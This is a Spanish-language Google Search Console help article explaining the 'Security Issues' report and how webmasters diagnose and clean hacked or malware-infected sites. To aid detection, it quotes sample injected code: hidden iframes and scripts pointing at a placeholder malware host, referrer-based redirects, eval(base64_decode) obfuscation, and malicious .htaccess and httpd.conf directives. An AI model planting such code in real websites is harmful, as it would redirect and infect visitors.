Informe "Problemas de seguridad"

Si en una evaluación de Google se determina que tu sitio web ha sido pirateado o que tiene un comportamiento potencialmente dañino para los visitantes o para sus ordenadores, en el informe "Problemas de seguridad" se muestra todo lo que ha hecho saltar algún aviso de Google, incluidos los ataques de phishing y las instalaciones de software malicioso o no deseado en el ordenador de los usuarios.

Es posible que las páginas o los sitios web afectados por problemas de seguridad aparezcan marcados con etiquetas de advertencia en los resultados de búsqueda, o que el navegador muestre una página de advertencia intersticial cuando algún usuario quiera visitarlas.

Abrir el informe "Problemas de seguridad"

 

¿Qué son los problemas de seguridad?

Los problemas de seguridad se pueden dividir en estas categorías:

  • Contenido pirateado: contenido que se coloca en tu sitio web sin tu permiso porque se ha vulnerado su seguridad. Para proteger a sus usuarios, Google hace todo lo posible para que no aparezca contenido pirateado en sus resultados de búsqueda. Más información
  • Software malicioso y software no deseado: software diseñado para dañar un dispositivo o a sus usuarios, que les perjudica o que utiliza prácticas engañosas o imprevistas. Más información
  • Ingeniería social: contenido creado con el fin de engañar a los visitantes para que realicen una acción con riesgo, como revelar información confidencial o descargar software. Más información

¿Hay algún problema de seguridad en mi sitio web?

Si se detectan problemas de seguridad en tu sitio web, los verás en un recuento al principio del informe.

Si tu sitio web no presenta ningún problema de seguridad, verás una marca de verificación verde y el mensaje correspondiente.

¡Pero si acabo de comprar este sitio web!

Si recientemente has comprado un sitio web que ya tenía algún problema de seguridad, soluciona los que se indican en el informe. A continuación, menciona en tu solicitud de reconsideración que lo has comprado hace poco y que ahora cumple las directrices para webmasters de Google.

¿Qué páginas se ven afectadas?

Muestra la descripción de un problema para ver una lista de URL afectadas de ejemplo. Esta lista no tiene que ser exhaustiva, sino solo una muestra de páginas de tu sitio web que se han visto afectadas por un problema concreto. Es posible que aparezca algún problema de seguridad sin URLs de ejemplo, pero eso no significa que no haya páginas afectadas, sino que no se han podido generar muestras por algún motivo.

En la página de detalles del problema se muestra la fecha en que se detectó este problema por primera vez en tu sitio web, así como una breve descripción y un enlace para obtener más información sobre él.

Resolver el problema

Para solucionar un problema de seguridad de tu sitio web, sigue estos pasos:

  1. Abre la descripción del problema del informe "Problemas de seguridad".
  2. Léela y haz clic en el enlace "Más información" para obtener información detallada y saber qué pasos debes seguir para solucionar el problema. Estos enlaces redirigen a las descripciones que aparecen más abajo en este artículo.
  3. Puedes ir probando soluciones al problema con la muestra de las páginas afectadas que aparece en la sección de detalles. Esta lista no tiene que ser exhaustiva, sino solo una muestra de páginas de tu sitio web que se han visto afectadas por un problema concreto. Es posible que aparezca algún problema de seguridad sin ninguna URL de ejemplo, pero eso no significa que no haya páginas afectadas, sino que no se han podido generar muestras por algún motivo.
  4. Soluciona el problema en todas las páginas de tu sitio web, ya que, si solo lo solucionas en algunas, seguirás sin aparecer en los resultados de búsqueda.
  5. Si en el informe se indican varios problemas de seguridad que afectan a tu sitio web, debes solucionarlos todos.
  6. Prueba tus correcciones.
  7. Cuando hayas solucionado los todos los problemas de todas las páginas que se indicaban en el informe "Problemas de seguridad", vuelve a ese informe y haz clic en Solicitar revisión. En tu solicitud de reconsideración, describe las correcciones que has hecho. Una buena solicitud cumple tres requisitos:
    • Se explica con exactitud cuál es el problema de calidad del sitio web.
    • Se describen los pasos que se han llevado a cabo para solucionar el problema.
    • Se documenta el resultado de las soluciones.
  8. Las revisiones de reconsideración pueden tardar una o dos semanas; Google te informará sobre cómo progresan por correo electrónico. Cuando envíes la solicitud, recibirás un mensaje de confirmación para informarte de que la revisión está en progreso. No vuelvas a enviar otra solicitud hasta que no se te notifique una decisión final sobre la solicitud pendiente.

¿Cuánto tiempo tardan las revisiones de reconsideración en completarse?

Pueden tardar entre una o dos semanas. Google te enviará un correo electrónico cuando reciba tu solicitud para que sepas que está activa, y otro cuando se complete la revisión.

No vuelvas a enviar otra solicitud hasta que no se resuelva cualquier solicitud pendiente. Si envías una solicitud de reconsideración cuando el problema todavía no se ha solucionado, puede que tardes más tiempo en recibir una respuesta cuando envíes otra solicitud, o incluso puede que se te identifique como infractor reincidente.

Lista de problemas de seguridad

A continuación, se incluye una lista de posibles problemas de seguridad, con información sobre cómo se puede solucionar cada uno de ellos.

Páginas engañosas

Tu sitio web incluye contenido creado con el fin de engañar a los visitantes para que realicen una acción con riesgo, como revelar información confidencial o descargar software. Navegación Segura de Google protege a los usuarios de la Web, ya que marca con una advertencia las páginas en las que se muestra contenido engañoso con frecuencia.

Las páginas web se consideran engañosas cuando en ellas:

  • Se pretende suplantar a una entidad de confianza, como tu dispositivo o tu navegador, o el sitio web en sí.
  • Se intenta incitar al usuario a hacer algo que solo haría ante una entidad de confianza, como compartir contraseñas, llamar a servicios técnicos o descargar software.

Este tipo de contenido engañoso se denomina ingeniería social. Obtén más información sobre la ingeniería social o consulta ejemplos de páginas engañosas.

Resolver el problema

1. Confirma que existe el problema

Visita las páginas de ejemplo para buscar contenido engañoso. Con la herramienta de inspección de URLs, puedes ver tu sitio web como se vería desde dispositivos móviles o desde ordenadores.

2. Corrige tus páginas

Corrige las páginas en las que haya prácticas de ingeniería social. Si crees que Navegación Segura se ha equivocado al clasificar una página web, notifícalo.

3. Solicita una revisión

Cuando confirmes que el problema se ha resuelto en tu sitio web, solicita una revisión de seguridad mediante el informe "Problemas de seguridad". Estas revisiones pueden tardar entre unos pocos días y unas pocas semanas en completarse.

Recursos insertados engañosos

Tu sitio web incluye recursos insertados o anuncios engañosos con el fin de engañar a los visitantes para que realicen una acción peligrosa, como revelar información confidencial o descargar software no deseado. El contenido engañoso puede estar en recursos insertados en la página, como imágenes, otros componentes de terceros o anuncios. Navegación Segura de Google protege a los usuarios de la Web, ya que marca con una advertencia las páginas en las que se muestra contenido engañoso con frecuencia.

En otros casos, el sitio web de alojamiento no contiene anuncios visibles, pero lleva a los usuarios a páginas engañosas mediante ventanas emergentes, ventanas subyacentes u otros tipos de redirección. En todos los casos, este tipo de contenido insertado constituirá una infracción de las políticas por parte de la página de alojamiento.

Este tipo de contenido engañoso se denomina ingeniería social. Obtén más información sobre la ingeniería social o consulta ejemplos de recursos insertados engañosos.

Resolver el problema

1. Confirma que existe el problema

Visita las páginas de ejemplo para buscar contenido engañoso y comprueba que ningún anuncio, imagen ni otro recurso de terceros que se haya insertado en las páginas de tu sitio web sea engañoso. Ten en cuenta que las redes publicitarias pueden mostrar anuncios distintos en diferentes páginas de tu sitio web. Por lo tanto, tienes que actualizar la página unas cuantas veces para ver si aparecen anuncios de ingeniería social. Algunos anuncios pueden mostrarse de forma distinta en dispositivos móviles y en ordenadores. Con la herramienta de inspección de URLs, puedes ver tu sitio web como se vería desde dispositivos móviles o desde ordenadores.

2. Elimina los anuncios o recursos engañosos

Comprueba si hay recursos de terceros en tu sitio web y que ningún anuncio, imagen ni recurso de terceros que se haya insertado en las páginas de tu sitio web sean engañosos. Corrige las páginas en las que haya prácticas de ingeniería social

3. Solicita una revisión

Cuando confirmes que el problema se ha resuelto en tu sitio web, solicita una revisión de seguridad mediante el informe "Problemas de seguridad". Estas revisiones pueden tardar entre unos pocos días y unas pocas semanas en completarse.

Software malicioso
Tu sitio web está infectado por software malicioso o se ha insertado este tipo de software en él. El software malicioso es cualquier software o aplicación móvil que se haya diseñado con el objetivo de perjudicar a los usuarios o de dañar un ordenador, un dispositivo móvil o el software que se ejecuta en ellos.

1. Comprueba si puedes solucionar este problema

Para poder solucionar un problema de software malicioso de tu sitio web, tienes que saber leer y entender el código y las configuraciones del servidor web de tu sitio web. Si crees que te hace falta más ayuda, consulta el artículo Crear un equipo de asistencia para buscar ayuda.

2. Diagnostica y soluciona tu problema de software malicioso

Hay muchos tipos de software malicioso. En las siguientes secciones se explican formas de diagnosticar y corregir el tipo de software malicioso concreto que te está perjudicando. Ten en cuenta que es posible que tu sitio web esté infectado por más de un tipo de software malicioso, así que lo más recomendable es hacer el diagnóstico de tu sitio web y limpiarlo.

Tipo de software malicioso: configuración del servidor

Descripción

Un pirata informático ha vulnerado tu sitio web y redirige a tus visitantes a su sitio web atacante con software malicioso, probablemente modificando los archivos de configuración de tu servidor. Estos archivos suelen permitir que el administrador del sitio web especifique redirecciones de URL a páginas o directorios concretos de un sitio. Por ejemplo, los errores presentes en los servidores web Apache pueden declararse en los archivos .htaccess y httpd.conf.

Corregir el problema

1. Confirma que existe el problema

Visita algunas de las URL de ejemplo que se indican en el informe "Problemas de seguridad".

Evita usar un navegador para ver páginas infectadas de tu sitio web.

El software malicioso suele aprovecharse de las vulnerabilidades de los navegadores para propagarse, por lo que, si abres una página infectada por software malicioso con un navegador, tu ordenador puede sufrir daños. Además, es posible que los hackers oculten el contenido fraudulento con técnicas de encubrimiento para evitar que los propietarios de sitios web afectados los detecten.

A continuación se indican dos métodos alternativos para ver contenido de manera más segura en tu ordenador:

  • Usar la herramienta de inspección de URLs, que sirve para ver tu página tal como la ve Google. Este método resulta útil porque muchos hackers hacen cambios que solo puede detectar Google, como por ejemplo, incluir enlaces que dirigen a sitios web de los hackers pero que solo aparecen cuando la URL referente es de Google.
  • Utilizar cURL o Wget para hacer solicitudes HTTP, como obtener una página, desde la línea de comandos. Estas herramientas gratuitas resultan útiles para diagnosticar redirecciones y permiten indicar datos de la URL referente o el agente de usuario. A menudo, los hackers atacan solo a agentes de usuario o URL referentes concretas para evitar ser detectados y seleccionar mejores objetivos; con estas herramientas, puedes simular objetivos. Si tu solicitud no provoca el comportamiento fraudulento, prueba a utilizar URL referentes distintas, como enlaces provenientes de sitios web grandes o de diferentes buscadores. Por ejemplo, para emular un usuario que sigue un enlace de los resultados de la Búsqueda de Google que lleva a www.example.com/page.html en Windows, debes utilizar cURL de esta manera:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

La respuesta de una página que se haya infectado mediante archivos de "configuración del servidor" puede incluir los encabezados siguientes:

...
< HTTP/1.1 301 Moved Permanently
< Date: Sun, 24 Feb 2013 21:06:45 GMT
< Server: Apache
< Location: http://<sitio-web-atacante-con-software-malicioso>/index.html
< Content-Length: 253
...

2. Limpia tu sitio web de software malicioso de "configuración del servidor"

Inicia sesión en tu servidor a través de un acceso de shell o terminal (el sitio web puede estar sin conexión) y revisa los archivos de configuración del servidor que correspondan. Puede que haya más de uno de estos archivos pirateado en tu sitio web. Comprueba si hay directivas no deseadas en estos archivos, como redirecciones, que el hacker haya podido configurar para que tu sitio redirija a sitios web atacantes desconocidos con software malicioso. Por ejemplo, en el archivo .htaccess, es posible que veas una redirección como la siguiente:

RewriteEngine On 
RewriteCond %{HTTP_REFERER} .*google.* 
RewriteRule ^third-page.html($|/) http://<sitio-web-con-software-malicioso>/index.html [R=301]

 

Además:

  • Asegúrate de comprobar todo el archivo en caso de que el hacker haya añadido su código al final del documento, donde es más fácil que pase desapercibido.
  • Investiga las posibles tareas Cron que haya creado el hacker con el fin de seguir actualizando el archivo .htaccess. Las tareas cron pueden aparecer en varias rutas, como /etc/crontab (entre otros muchos directorios /etc/cron*) y /var/spool/cron.
  • Lee la guía sobre cómo reparar sitios web pirateados para tener una solución completa y aplicarla en tu sitio web, además de consultar pasos de limpieza y conocer consejos para evitar que tu sitio web vuelva a ser pirateado.
Tipo de software malicioso: inyección SQL

Descripción

Probablemente un pirata informático ha vulnerado la seguridad de la base de datos de tu sitio web. Por ejemplo, el pirata informático puede haber insertado automáticamente un código malicioso en todos los registros de la tabla de base de datos; de esta forma, cuando el servidor carga una página que requiere información de la base de datos, el código malicioso se inserta en el contenido de la página y pone en riesgo a los visitantes del sitio web.

Corregir el problema

1. Confirma que existe el problema

Ejecuta algunas consultas en las URL afectadas desde la línea de comandos y examina qué respuesta hay a palabras de posibles ataques de SQL como "iframe" o "eval".

Evita usar un navegador para ver páginas infectadas de tu sitio web.

El software malicioso suele aprovecharse de las vulnerabilidades de los navegadores para propagarse, por lo que, si abres una página infectada por software malicioso con un navegador, tu ordenador puede sufrir daños. Además, es posible que los hackers oculten el contenido fraudulento con técnicas de encubrimiento para evitar que los propietarios de sitios web afectados los detecten.

A continuación se indican dos métodos alternativos para ver contenido de manera más segura en tu ordenador:

  • Usar la herramienta de inspección de URLs, que sirve para ver tu página tal como la ve Google. Este método resulta útil porque muchos hackers hacen cambios que solo puede detectar Google, como por ejemplo, incluir enlaces que dirigen a sitios web de los hackers pero que solo aparecen cuando la URL referente es de Google.
  • Utilizar cURL o Wget para hacer solicitudes HTTP, como obtener una página, desde la línea de comandos. Estas herramientas gratuitas resultan útiles para diagnosticar redirecciones y permiten indicar datos de la URL referente o el agente de usuario. A menudo, los hackers atacan solo a agentes de usuario o URL referentes concretas para evitar ser detectados y seleccionar mejores objetivos; con estas herramientas, puedes simular objetivos. Si tu solicitud no provoca el comportamiento fraudulento, prueba a utilizar URL referentes distintas, como enlaces provenientes de sitios web grandes o de diferentes buscadores. Por ejemplo, para emular un usuario que sigue un enlace de los resultados de la Búsqueda de Google que lleva a www.example.com/page.html en Windows, debes utilizar cURL de esta manera:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

A continuación, inicia sesión en el servidor de tu base de datos o consúltala mediante una herramienta como phpMyAdmin. Si usas Wget o cURL, aprovéchalas para correlacionar los daños detectados en el código fuente de la página con las entradas de la base de datos. Por ejemplo, si ves que tus páginas incluyen un iframe peligroso, puedes realizar una consulta SQL buscando el código de ese iframe. Por ejemplo:

SELECT * FROM blog_posts WHERE post_text LIKE '%>iframe%'; 

También es recomendable comprobar si hay actividad inusual en el registro de la base de datos y en los archivos de error del servidor como, por ejemplo, errores o comandos SQL inesperados que no suelan aparecer con usuarios habituales.

2. Limpia tu sitio web

Cuando todo esté listo para limpiar tu sitio web, puedes actualizar cada registro infectado de la base de datos o restaurar la última copia de seguridad conocida de la base de datos.

Además:

Tipo de software malicioso: inyección de código

Descripción

Las páginas de tu sitio web se han modificado e incluyen código malicioso, como un iframe, en un sitio web atacante con software malicioso.

Corregir el problema

1. Confirma que existe el problema

Visita las URL infectadas que se indican en el informe "Problemas de seguridad" y examina el HTML de las respuestas en busca de código malicioso.

Evita usar un navegador para ver páginas infectadas de tu sitio web.

El software malicioso suele aprovecharse de las vulnerabilidades de los navegadores para propagarse, por lo que, si abres una página infectada por software malicioso con un navegador, tu ordenador puede sufrir daños. Además, es posible que los hackers oculten el contenido fraudulento con técnicas de encubrimiento para evitar que los propietarios de sitios web afectados los detecten.

A continuación se indican dos métodos alternativos para ver contenido de manera más segura en tu ordenador:

  • Usar la herramienta de inspección de URLs, que sirve para ver tu página tal como la ve Google. Este método resulta útil porque muchos hackers hacen cambios que solo puede detectar Google, como por ejemplo, incluir enlaces que dirigen a sitios web de los hackers pero que solo aparecen cuando la URL referente es de Google.
  • Utilizar cURL o Wget para hacer solicitudes HTTP, como obtener una página, desde la línea de comandos. Estas herramientas gratuitas resultan útiles para diagnosticar redirecciones y permiten indicar datos de la URL referente o el agente de usuario. A menudo, los hackers atacan solo a agentes de usuario o URL referentes concretas para evitar ser detectados y seleccionar mejores objetivos; con estas herramientas, puedes simular objetivos. Si tu solicitud no provoca el comportamiento fraudulento, prueba a utilizar URL referentes distintas, como enlaces provenientes de sitios web grandes o de diferentes buscadores. Por ejemplo, para emular un usuario que sigue un enlace de los resultados de la Búsqueda de Google que lleva a www.example.com/page.html en Windows, debes utilizar cURL de esta manera:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

A continuación se muestran algunos ejemplos de código malicioso:

  • iframe que carga un sitio web malicioso:
    <iframe frameborder="0" height="0" src="http://<sitio-web-con-software-malicioso>/path/file" 
      style="display:none" width="0"></iframe>
  • JavaScript u otro lenguaje de secuencia de comandos que llame a estas secuencias y las ejecute desde un sitio web atacante:
    <script type='text/javascript' src='http://<sitio-web-con-software-malicioso>/js/x55.js'></script>
  • Secuencias de comandos que redirigen a un sitio web atacante:
    <script>
      if (document.referrer.match(/google\.com/)) {
        window.location("http://<sitio-web-con-software-malicioso>/");
      }
    </script>
  • Código malicioso oculto para impedir que se detecte
    eval(base64_decode("aWYoZnVuaauUl+hasdqetiDi2iOwlOHTgs+slgsfUNlsgasdf"));
  • Archivos de objeto compartido con el objetivo de escribir código malicioso de forma aleatoria en secuencias de comandos benignas:
    #httpd.conf editado por el hacker
    LoadModule harmful_module modules/mod_harmful.so
    AddModule mod_harmful.c

Investiga todo el posible código malicioso que aparezca en el sitio. Puede ser útil buscar palabras como "iframe" para encontrar los códigos de iframes. Otras palabras clave útiles son "script", "eval" y "unescape". Por ejemplo, puedes buscar en todos los archivos "iframe" en sistemas basados en Unix de esta forma:

$grep -irn "iframe" ./ | less

2. Limpia tu sitio web

Cuando todo esté listo para limpiar tu sitio web, puedes sustituir los archivos afectados por la última copia de seguridad en buen estado o puedes quitar la inyección de código de cada página y todas las funciones o los archivos de secuencias de comandos relacionados. Si has editado los archivos de configuración del servidor, es posible que tengas que reiniciar el servidor web para que los cambios se apliquen.

Además:

Tipo de software malicioso: plantilla de errores

Descripción

La plantilla utilizada para mensajes de error, como "404: archivo no encontrado", está configurada para distribuir software malicioso. De este modo, es posible atacar URLs que ni siquiera están en tu sitio web.

Corregir el problema

1. Confirma que existe el problema

Solicita una página en tu sitio web que no exista o que genere otro tipo de error y examina la respuesta para ver si procede de otro sitio web o si contiene software malicioso de alguna otra manera.

Evita usar un navegador para ver páginas infectadas de tu sitio web.

El software malicioso suele aprovecharse de las vulnerabilidades de los navegadores para propagarse, por lo que, si abres una página infectada por software malicioso con un navegador, tu ordenador puede sufrir daños. Además, es posible que los hackers oculten el contenido fraudulento con técnicas de encubrimiento para evitar que los propietarios de sitios web afectados los detecten.

A continuación se indican dos métodos alternativos para ver contenido de manera más segura en tu ordenador:

  • Usar la herramienta de inspección de URLs, que sirve para ver tu página tal como la ve Google. Este método resulta útil porque muchos hackers hacen cambios que solo puede detectar Google, como por ejemplo, incluir enlaces que dirigen a sitios web de los hackers pero que solo aparecen cuando la URL referente es de Google.
  • Utilizar cURL o Wget para hacer solicitudes HTTP, como obtener una página, desde la línea de comandos. Estas herramientas gratuitas resultan útiles para diagnosticar redirecciones y permiten indicar datos de la URL referente o el agente de usuario. A menudo, los hackers atacan solo a agentes de usuario o URL referentes concretas para evitar ser detectados y seleccionar mejores objetivos; con estas herramientas, puedes simular objetivos. Si tu solicitud no provoca el comportamiento fraudulento, prueba a utilizar URL referentes distintas, como enlaces provenientes de sitios web grandes o de diferentes buscadores. Por ejemplo, para emular un usuario que sigue un enlace de los resultados de la Búsqueda de Google que lleva a www.example.com/page.html en Windows, debes utilizar cURL de esta manera:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

2. Limpia tu sitio web

Inicia sesión en tu servidor web y busca en los archivos de configuración de tu servidor las directivas de página de error. Por ejemplo, la plantilla de errores presentes en los servidores web Apache pueden declararse en el archivo .htaccess. A continuación se muestra un ejemplo de entrada de archivo .htaccess que genera el error 404 de un sitio malicioso:

ErrorDocument 404 http://<sitio-web-con-software-malicioso>/index.html 

Cuando todo esté listo para limpiar tu sitio web, puedes sustituir los archivos .htaccess con una copia de seguridad en buen estado o eliminar las directivas ErrorDocument no deseadas de los archivos .htaccess. Debes limpiar también los propios archivos de error de tu sitio. Por último, reinicia tu servidor web para asegurarte de que todos los cambios se hayan aplicado.

Además:

Tipo de software malicioso: software malicioso entre sitios

Descripción

El sitio web está cargando contenido de un sitio web que contiene contenido malicioso. En Chrome, aparece indicado en un intersticial en el navegador con la siguiente imagen:

cross-site malware warning

Corrige el problema

  1. Explorando algunas de las URL de muestra que se indican en el informe "Problemas de seguridad" para confirmar que hay un problema. Si se trata de un problema de software malicioso entre sitios, verás la imagen.
  2. En la advertencia del navegador se indica el dominio del contenido cuestionable. Elimina todas las referencias al sitio marcado en la advertencia del navegador.
  3. Si detectas que una página de tu sitio web incluye sin tu conocimiento contenido de un sitio web marcado, el problema es más grave y es muy probable que hayan vulnerado tu sitio web. En cualquier caso, Google recomienda seguir el protocolo de recuperación indicado en la guía para reparar sitios web pirateados y poner tu sitio en cuarentena, evaluar sus daños y limpiarlo.
  4. Después de eliminar todo el contenido de ingeniería social de tu sitio web, solicita una revisión de seguridad mediante el informe "Problemas de seguridad". Estas revisiones pueden tardar entre unos pocos días y unas pocas semanas en completarse.
  5. Si has incluido intencionadamente contenido de un sitio web legítimo que ha sido denunciado y quieres volver a incluirlo una vez que se ha limpiado el sitio web denunciado, puedes saber el estado de este sitio web a través de la página de diagnósticos Navegación Segura de Google en ese sitio web (http://www.google.com/safebrowsing/diagnostic?site=www.example.com). Los sitios legítimos suelen limpiarlos rápidamente sus propietarios.
Otros tipos de software malicioso

Hay muchos otros tipos de software malicioso que pueden afectar a tu sitio web. Consulta el sitio web Aspectos básicos de la Web para obtener más consejos sobre cómo diagnosticar y corregir otros tipos de piratería. Después de solucionar los problemas de tu sitio web, recuerda solicitar una revisión.

3. Solicita una revisión

Cuando confirmes que el problema se ha resuelto en tu sitio web, solicita una revisión de seguridad mediante el informe "Problemas de seguridad". Estas revisiones pueden tardar entre unos pocos días y unas pocas semanas en completarse.

Tipo de piratería: inyección de código

Un pirata informático ha vulnerado tu sitio web y está inyectando código malicioso en tus páginas. Por ejemplo, redirige a un sitio web malicioso o ejecuta software de minería de criptomonedas en tu navegador mientras la página está abierta.

1. Comprueba si puedes solucionar este problema

Consulta el artículo Crear un equipo de asistencia para saber más o menos qué te hace falta para solucionar el problema por tu cuenta o cómo encontrar ayuda si crees que no tienes los conocimientos necesarios.

2. Confirma que existe el problema

Evita usar un navegador para ver páginas infectadas de tu sitio web.

El software malicioso suele aprovecharse de las vulnerabilidades de los navegadores para propagarse, por lo que, si abres una página infectada por software malicioso con un navegador, tu ordenador puede sufrir daños. Además, es posible que los hackers oculten el contenido fraudulento con técnicas de encubrimiento para evitar que los propietarios de sitios web afectados los detecten.

A continuación se indican dos métodos alternativos para ver contenido de manera más segura en tu ordenador:

  • Usar la herramienta de inspección de URLs, que sirve para ver tu página tal como la ve Google. Este método resulta útil porque muchos hackers hacen cambios que solo puede detectar Google, como por ejemplo, incluir enlaces que dirigen a sitios web de los hackers pero que solo aparecen cuando la URL referente es de Google.
  • Utilizar cURL o Wget para hacer solicitudes HTTP, como obtener una página, desde la línea de comandos. Estas herramientas gratuitas resultan útiles para diagnosticar redirecciones y permiten indicar datos de la URL referente o el agente de usuario. A menudo, los hackers atacan solo a agentes de usuario o URL referentes concretas para evitar ser detectados y seleccionar mejores objetivos; con estas herramientas, puedes simular objetivos. Si tu solicitud no provoca el comportamiento fraudulento, prueba a utilizar URL referentes distintas, como enlaces provenientes de sitios web grandes o de diferentes buscadores. Por ejemplo, para emular un usuario que sigue un enlace de los resultados de la Búsqueda de Google que lleva a www.example.com/page.html en Windows, debes utilizar cURL de esta manera:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

El pirata informático puede haber inyectado código malicioso directamente en los archivos HTML de tu sitio web (por ejemplo, con una redirección de JavaScript) o en archivos que generan el contenido de tu sitio web (por ejemplo, archivos de PHP).

Busca una página pirateada que aparezca en el informe y examina la respuesta. Los piratas informáticos pueden usar varias técnicas distintas para redirigir a tus visitantes a su sitio web, incluidas las siguientes:

  • Redirecciones:
    • Redirecciones en el encabezado: los piratas informáticos pueden redirigir a los visitantes editando los archivos de configuración de tu servidor. Estos archivos suelen permitir que el administrador del sitio web especifique redirecciones de URL a páginas o directorios concretos de un sitio. Por ejemplo, los errores presentes en los servidores web Apache pueden declararse en los archivos .htaccess y httpd.conf.
      ...
      < HTTP/1.1 301 Moved Permanently
      < Date: Sun, 24 Feb 2013 21:06:45 GMT
      < Server: Apache
      < Location: http://<sitio-web-con-software-malicioso>/index.html
      < Content-Length: 253
    • Redirecciones de JavaScript:
      <script>
        if (document.referrer.match(/google\.com/)) {
          window.location("http://<sitio-web-con-software-malicioso>/");}
      <script>
  • JavaScript malicioso cargado desde otro sitio web:
    <script type='text/javascript' src='http://<sitio-web-con-software-malicioso>/js/x55.js'></script>
  • Código malicioso oculto para evitar su detección:
    eval(base64_decode("d2luZG93LmxvY2F0aW9uPScvL2dvb2dsZS5jb20nOw=="));

Busca el código sospechoso en tus respuestas y en tu sitio web. Entre los términos de búsqueda útiles se encuentran "search", "eval", "base64_decode" y "unescape".

3. Limpia tu sitio web

Cuando tengas todo listo para limpiar tu sitio web, puedes retirar el contenido fraudulento o sustituir los archivos afectados por la última copia de seguridad que tengas en buen estado.

Además:

4. Solicita una revisión

Cuando confirmes que el problema se ha resuelto en tu sitio web, solicita una revisión de seguridad mediante el informe "Problemas de seguridad". Estas revisiones pueden tardar entre unos pocos días y unas pocas semanas en completarse.

Tipo de piratería: inyección de contenido

Un pirata informático ha añadido enlaces a contenido fraudulento o texto a las páginas de tu sitio web. El contenido inyectado puede incluir términos farmacéuticos u otro tipo de spam no relacionado con el contenido del sitio.

Los hackers suelen seguir los métodos siguientes para modificar sitios:

  • Obtienen acceso a un directorio no seguro de tu servidor. Por ejemplo, puedes haberte dejado sin querer un directorio con permisos abiertos.
  • Aprovechan alguna vulnerabilidad del software que se ejecuta en tu sitio web, como un sistema de gestión de contenido. Por ejemplo, es posible que utilices una versión de Drupal, Joomla! o WordPress antigua y poco segura.
  • Piratean complementos de terceros que usas en tu sitio web, como contadores de visitantes.

1. Comprueba si puedes solucionar este problema

Consulta el artículo Crear un equipo de asistencia para saber más o menos qué te hace falta para solucionar el problema por tu cuenta o cómo encontrar ayuda si crees que no tienes los conocimientos necesarios.

2. Confirma que existe el problema

Evita usar un navegador para ver páginas infectadas de tu sitio web.

El software malicioso suele aprovecharse de las vulnerabilidades de los navegadores para propagarse, por lo que, si abres una página infectada por software malicioso con un navegador, tu ordenador puede sufrir daños. Además, es posible que los hackers oculten el contenido fraudulento con técnicas de encubrimiento para evitar que los propietarios de sitios web afectados los detecten.

A continuación se indican dos métodos alternativos para ver contenido de manera más segura en tu ordenador:

  • Usar la herramienta de inspección de URLs, que sirve para ver tu página tal como la ve Google. Este método resulta útil porque muchos hackers hacen cambios que solo puede detectar Google, como por ejemplo, incluir enlaces que dirigen a sitios web de los hackers pero que solo aparecen cuando la URL referente es de Google.
  • Utilizar cURL o Wget para hacer solicitudes HTTP, como obtener una página, desde la línea de comandos. Estas herramientas gratuitas resultan útiles para diagnosticar redirecciones y permiten indicar datos de la URL referente o el agente de usuario. A menudo, los hackers atacan solo a agentes de usuario o URL referentes concretas para evitar ser detectados y seleccionar mejores objetivos; con estas herramientas, puedes simular objetivos. Si tu solicitud no provoca el comportamiento fraudulento, prueba a utilizar URL referentes distintas, como enlaces provenientes de sitios web grandes o de diferentes buscadores. Por ejemplo, para emular un usuario que sigue un enlace de los resultados de la Búsqueda de Google que lleva a www.example.com/page.html en Windows, debes utilizar cURL de esta manera:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Explora páginas de tu sitio web y busca en las respuestas contenido sospechoso o enlaces que no hayas añadido. Por ejemplo, haz búsquedas de términos farmacéuticos o con contenido fraudulento, como "viagra" o "ganar dinero".

3. Limpia tu sitio web

Cuando tengas todo listo para limpiar tu sitio web, puedes retirar el contenido y los enlaces fraudulentos de cada página o sustituir los archivos afectados por la última copia de seguridad que tengas en buen estado. Debes corregir todos los ejemplos de piratería que aparecen en la página "Problemas de seguridad". Además, busca en Google otras páginas en tu sitio web que puedan haber sido pirateadas con el operador de búsqueda "site:" y localiza los archivos de origen de tu sitio web.

Además:

4. Solicita una revisión

Cuando confirmes que el problema se ha resuelto en tu sitio web, solicita una revisión de seguridad mediante el informe "Problemas de seguridad". Estas revisiones pueden tardar entre unos pocos días y unas pocas semanas en completarse.

Tipo de piratería: inyección de URL

Un pirata informático ha creado páginas en tu sitio web, probablemente con palabras o enlaces de contenido fraudulento. A veces, estas páginas nuevas contienen código que provocan acciones no deseadas, como redirigir usuarios a otros sitios o hacer que tu servidor web participe en un ataque de denegación de servicio a otros sitios.

1. Comprueba si puedes solucionar este problema

Consulta el artículo Crear un equipo de asistencia para saber más o menos qué te hace falta para solucionar el problema por tu cuenta o cómo encontrar ayuda si crees que no tienes los conocimientos necesarios.

2. Confirma que existe el problema

Evita usar un navegador para ver páginas infectadas de tu sitio web.

El software malicioso suele aprovecharse de las vulnerabilidades de los navegadores para propagarse, por lo que, si abres una página infectada por software malicioso con un navegador, tu ordenador puede sufrir daños. Además, es posible que los hackers oculten el contenido fraudulento con técnicas de encubrimiento para evitar que los propietarios de sitios web afectados los detecten.

A continuación se indican dos métodos alternativos para ver contenido de manera más segura en tu ordenador:

  • Usar la herramienta de inspección de URLs, que sirve para ver tu página tal como la ve Google. Este método resulta útil porque muchos hackers hacen cambios que solo puede detectar Google, como por ejemplo, incluir enlaces que dirigen a sitios web de los hackers pero que solo aparecen cuando la URL referente es de Google.
